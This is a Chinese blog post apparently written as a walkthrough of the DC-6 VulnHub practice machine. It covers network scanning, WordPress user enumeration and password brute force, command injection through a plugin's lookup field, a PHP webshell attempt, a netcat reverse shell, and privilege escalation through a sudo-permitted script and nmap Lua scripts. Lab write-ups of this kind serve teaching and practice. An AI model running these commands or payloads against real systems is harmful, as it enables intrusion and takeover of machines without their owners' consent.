DC6靶场

最新推荐文章于 2024-03-26 16:08:20 发布
最新推荐文章于 2024-03-26 16:08:20 发布
阅读量1.9k 收藏 43
点赞数 47
分类专栏: DC靶场 文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/136656711
版权

信息收集

sudo arp-scan -l

ip地址为192.168.146.144

端口扫描、服务器版本探测

sudo nmap -A -sV -O -p- 192.168.146.144

开放了22端口和80端口

去网站访问一下,一直访问不出来,想到上次那个靶机

修改/etc/hosts文件

访问http://wordy

用的cms是wordpress5.1.1

wordy说它相当于是另一个wordpress网站,提供安全的插件

隐藏目录扫描

dirb http://wordy/ -X.php 

有登录页面

用针对wordpress的扫描器wpscan 扫描一下漏洞和用户

wpscan --url http://wordy -e

(枚举插件、用户名等) vp(显示有漏洞的插件),vt(显示有漏洞的主题),tt,u(用户名)

wpscan --url http://wordy -e vp,vt,tt,u

枚举出了5个用户

试试暴力破解

2009年一家名叫rockyou的公司遭到了黑客攻击,他们的密码列表以明文存储,黑客下载了所有的密码列表并且公开。rockyou.txt包含14341564个唯一密码,用于32603388个帐户

解压sudo gzip -d /usr/share/wordlists/rockyou.txt.gz后路径/usr/share/wordlists/rockyou.txt

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwd.txt 

筛选出所有包含k01字符串的行,然后将这些行保存到passwd.txt文件

wpscan --url http://wordy -P [密码字典] -U [用户名字典

账户名是mark,密码是helpdesk01

后台登录 看到这个插件 猜测插件漏洞

点击tools 发现

Convert能把ip转换为整数,能把整数转换为ip

lookup将 IP 地址解析为主机名,如果 dig 安装在 Web 服务器上,它也将用于查找。和nslookup命令相似

sqlmap试过了没有sql注入漏洞

输入127.0.0.1&ls 点击look up会出现ls命令执行的结果 (为什么这么做,我参考的网上的博客)

抓包

可以把ls替换成其它命令 查看刚刚ls命令列出来的一些文件

接下来要拿shell

失败尝试:根据目录跳到成功

echo "<?php @eval($_POST['123']);?>" > 2.php

echo命令用于在终端输出文本
>: 重定向符号,它会将前面的输出重定向到后面的文件中,如果文件不存在,它会创建该文件

写入一句话木马

然后用cat 2.php发现没有写进去

我发现命令执行没成功 后面会跟一个resolves to (推测可能会有过滤 比如不允许出现" / 符号 或者长度限制)

成功尝试:

进入开发者模式

会限制输入的字符最大长度为15

修改下

打开终端监听nc -lvvp 4444

-l:nc将处于侦听模式,nc被当作server,侦听并接受连接

-v:  输出交互或出错信息

-p:本地端口

nc -e /bin/bash

192.168.146.140 4444
使用 netcat 连接到 IP 地址为 192.168.146.140、端口号为 4444 的计算机,并在连接成功后,在该计算机上启动一个 bash shell

反弹shell成功

交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

是www-data用户

切换到mark用户 不行 可以直接cd /home/mark目录

告诉了graham的密码GSo7isUM1D4

提权:

find / -perm -4000 2>/dev/null

没有能用的

git提权

先用sudo  -l列出

(jens) NOPASSWD: /home/jens/backups.sh 可以对backups.sh执行写操作

查看 是一个脚本 能解压到/var/www/html目录

在脚本里写入shell

echo "/bin/bash" >>/home/jens/backups.sh

>>重定向操作符,>> 追加到 /home/jens/backups.sh 文件的末尾

然后用jens身份执行

sudo -u jens ./backups.sh

拿到jens的shell

执行sudo -l

NOPASSWD不需要密码 可以执行root权限的nmap   nmap可以用于suid提权

namp提权:

参考nmap提权几种方式-CSDN博客

第一种方法:

 执行nmap的可交互模式

sudo nmap --interactive

在nmap交互模式下键入!bash,即可得到bash的root权限

!bash 

不行,老版本才支持“interactive.”选项 以及不具有sudi权限

第二种方法:DC6靶场渗透流程(超详细)_dc-6靶机-CSDN博客

nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

TF=$(mktemp)

mktemp创建一个临时文件,并将该文件的路径存储在变量TF中

echo 'os.execute("/bin/sh")' > $TF 
将Lua脚本写入临时文件  $TF 引用临时文件的路径

sudo nmap --script=$TF
运行              

开放了ssh端口 这个没用上

MOMO8849
关注
  • 47
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机实战-DC-6
滕财然的博客
03-03 801
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC-6靶场实战
qq_42754807的博客
03-26 1005
DC-6靶场实战
DC6-靶机渗透
banacyo14206的博客
08-22 544
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( ...
DC6-靶机
Au
10-30 1659
下载地址 下面是作者的提示,和爆破的字典有关 cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 配置的环境: kali:192.168.25.131 DC6-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/...
DC-6靶机
Flamingo1998的博客
02-23 195
DC-6靶机
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
DC5-目录传参爆破字典
12-18
DC5主机靶场文件包含漏洞的数据包传参的函数字典
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
vulnhub之DC6靶机
LainWith的博客
02-14 537
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
Dc-6靶机实验
weixin_52263461的博客
03-17 402
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
渗透测试:DC-6靶机
Ciyaso的博客
08-21 288
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
DC靶机系列:DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
opengl 0X8DC6
05-31
抱歉,我之前的回答有误。在OpenGL中,0x8dc6代表GL_TRANSFORM_FEEDBACK_BUFFER_MODE属性,可以用来查询transform feedback缓冲区的模式。transform feedback是一种OpenGL功能,可以将顶点的输出数据写入到一个缓冲区中,用于后续的处理和渲染。GL_TRANSFORM_FEEDBACK_BUFFER_MODE属性的返回值是一个枚举类型,常见的枚举值有GL_INTERLEAVED_ATTRIBS、GL_SEPARATE_ATTRIBS等。这个属性通常会和其他OpenGL查询函数一起使用,例如glGetTransformFeedbackiv()函数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值